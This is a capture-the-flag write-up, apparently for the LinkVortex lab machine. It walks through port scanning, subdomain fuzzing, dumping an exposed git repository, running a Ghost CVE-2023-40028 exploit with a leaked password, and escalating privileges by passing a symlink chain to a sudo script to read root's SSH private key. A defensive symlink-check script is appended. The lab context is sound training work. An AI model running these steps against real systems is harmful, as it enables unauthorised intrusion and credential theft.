- I start with a scan of the open ports and then scan the versions and technologies running on the open ports found:
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.47 -oG scan
nmap -p22,80 -sCV -Pn 10.10.11.47 -oN ports

- I visit the site and see that an outdated version of Ghost is running. I find that it is affected by CVE-2023-40028. I need a valid credential to be able to abuse this vulnerability.

- I search for subdomains and find one:
wfuzz -c -t 100 --hh=230 -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -H "Host: FUZZ.linkvortex.htb" http://linkvortex.htb


- Enumerating the subdomain I found, I find a git repository. I download it with git-dumper:
git-dumper "http://dev.linkvortex.htb/.git" /home/rufo/linkVortex/content/example
- I search through the repository files and find some passwords. I try the passwords I found against the vulnerability found earlier and manage to obtain valid credentials:
./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
- I modify the script to point at the endpoint and manage to read internal files of the machine (LFI).


- Listing the repository files, I manage to find some credentials in the production environment configuration file.

- Thanks to these credentials I am able to log in via SSH and read the first flag.

- Listing the system files, I see that I can execute clean_symlink.sh as root, passing any file as an argument.
- I create a couple of symbolic links to be able to read the root user's SSH key:
ln -s /root/.ssh/id_rsa link1.txt
ln -s /tmp/a/link1.txt duo.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /tmp/a/duo.png
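The two-link chain above suggests the script inspects only the immediate target of a link rather than where it finally resolves (an inference, since its source is not shown here). As an added example that is not the machine's clean_symlink.sh, the bash check below resolves the whole chain and refuses any link that is more than one hop or whose final target leaves an allowed content directory; ALLOWED_ROOT is an assumed location.

```shell
#!/usr/bin/env bash
# Added example: hardened symlink check, not the machine's clean_symlink.sh.
# Assumption: a link is acceptable only if its fully resolved target stays
# under ALLOWED_ROOT (an assumed content directory) and it is a single hop.
ALLOWED_ROOT="${ALLOWED_ROOT:-/var/www/content}"

# Fully resolved target of a path, following every hop of a symlink chain.
final_target() {
    readlink -f -- "$1"
}

# Number of symlink hops from the given path to a non-link; a depth above 1
# means link-to-link, which is exactly what a one-hop check misses.
chain_depth() {
    local p="$1" depth=0 next
    while [ -L "$p" ]; do
        next=$(readlink -- "$p")
        # A relative target is resolved against the directory of the link itself.
        case "$next" in
            /*) p="$next" ;;
            *)  p="$(dirname -- "$p")/$next" ;;
        esac
        depth=$((depth + 1))
        if [ "$depth" -gt 40 ]; then break; fi   # guard against link loops
    done
    echo "$depth"
}

# Returns 0 (safe) only for a direct, single-hop link whose final target lies
# inside ALLOWED_ROOT; anything else (chains, escapes, dangling links) is 1.
symlink_is_safe() {
    local link="$1" target root
    [ -L "$link" ] || return 1
    target=$(final_target "$link") || return 1
    root=$(readlink -f -- "$ALLOWED_ROOT") || return 1
    [ "$(chain_depth "$link")" -eq 1 ] || return 1
    case "$target" in
        "$root"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Usage: check.sh /path/to/link   (exit status 0 = safe)
if [ "$#" -eq 1 ]; then symlink_is_safe "$1" && echo "safe: $1" || echo "refused: $1"; fi
```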

- With this key I connect via SSH as root and manage to read the second flag.
